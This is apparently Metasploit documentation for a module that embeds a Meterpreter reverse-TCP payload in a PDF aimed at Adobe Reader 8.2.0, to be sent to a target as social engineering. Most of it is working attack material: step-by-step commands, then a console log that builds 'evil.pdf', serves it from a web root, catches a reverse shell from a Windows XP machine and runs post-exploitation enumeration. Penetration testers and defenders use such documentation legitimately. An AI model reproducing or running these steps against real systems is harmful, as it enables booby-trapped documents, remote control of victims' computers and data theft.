## Vulnerable Application

This module embeds a Metasploit payload into an existing PDF file. The resulting PDF can be sent to a target as part of a social engineering attack.

Link to vulnerable software [OldVersion](http://www.oldversion.com/windows/download/acrobat-reader-8-2-0)

## Verification Steps

   1. Install application on the target machine
   2. Start msfconsole
   3. Do: ```use exploit/windows/fileformat/adobe_pdf_embedded_exe```
   4. Do: ```set payload [windows/meterpreter/reverse_tcp]```
   5. Do: ```set LHOST [IP]```
   6. Do: ```exploit```
   7. Do: ```use exploit/multi/handler```
   8. Do: ```set LHOST [IP]```
   9. Do: ```exploit```
   10. Do: Open PDF on target machine with vulnerable software

## Options

  **EXENAME**

  The Name of payload exe.

  **FILENAME**

  The output filename.

  **INFILENAME**

  The Input PDF filename.

  **LAUNCH_MESSAGE**

  The message to display in the `File:` area of the PDF.

## Scenarios

### Adobe Reader 8.2.0 on Windows XP (5.1 Build 2600, Service Pack 3)

  ```
  msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe
  msf exploit(windows/fileformat/adobe_pdf_embedded_exe) > set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp
  msf exploit(windows/fileformat/adobe_pdf_embedded_exe) > set LHOST 192.168.1.3
    LHOST => 192.168.1.3
  msf exploit(windows/fileformat/adobe_pdf_embedded_exe) > exploit

    [*] Reading in '/usr/share/metasploit-framework/data/exploits/CVE-2010-1240/template.pdf'...
    [*] Parsing '/usr/share/metasploit-framework/data/exploits/CVE-2010-1240/template.pdf'...
    [*] Using 'windows/meterpreter/reverse_tcp' as payload...
    [+] Parsing Successful. Creating 'evil.pdf' file...
    [+] evil.pdf stored at /root/.msf4/local/evil.pdf
  msf exploit(windows/fileformat/adobe_pdf_embedded_exe) > cp /root/.msf4/local/evil.pdf /var/www/html/evil.pdf
    [*] exec: cp /root/.msf4/local/evil.pdf /var/www/html/evil.pdf

  msf exploit(windows/fileformat/adobe_pdf_embedded_exe) > use exploit/multi/handler
  msf exploit(multi/handler) > set LHOST 192.168.1.3
    LHOST => 192.168.1.3
  msf exploit(multi/handler) > exploit

    [*] Started reverse TCP handler on 192.168.1.3:4444
    [*] Sending stage (180291 bytes) to 192.168.1.5
    [*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.5:1121) at 2019-12-09 14:17:10 -0700

  meterpreter > sysinfo
    Computer        : COMPUTER_1
    OS              : Windows XP (5.1 Build 2600, Service Pack 3).
    Architecture    : x86
    System Language : en_US
    Domain          : WORKGROUP
    Logged On Users : 2
    Meterpreter     : x86/windows
  meterpreter > getuid
    Server username: COMPUTER_1\USER
  meterpreter > run post/windows/gather/enum_applications

    [*] Enumerating applications installed on COMPUTER_1

      Installed Applications
      ======================

      Name                Version
      ----                -------
      Adobe Reader 8.2.0  8.2.0



    [+] Results stored in: /root/.msf4/loot/20191209141758_default_192.168.1.5_host.application_783490.txt
      ```
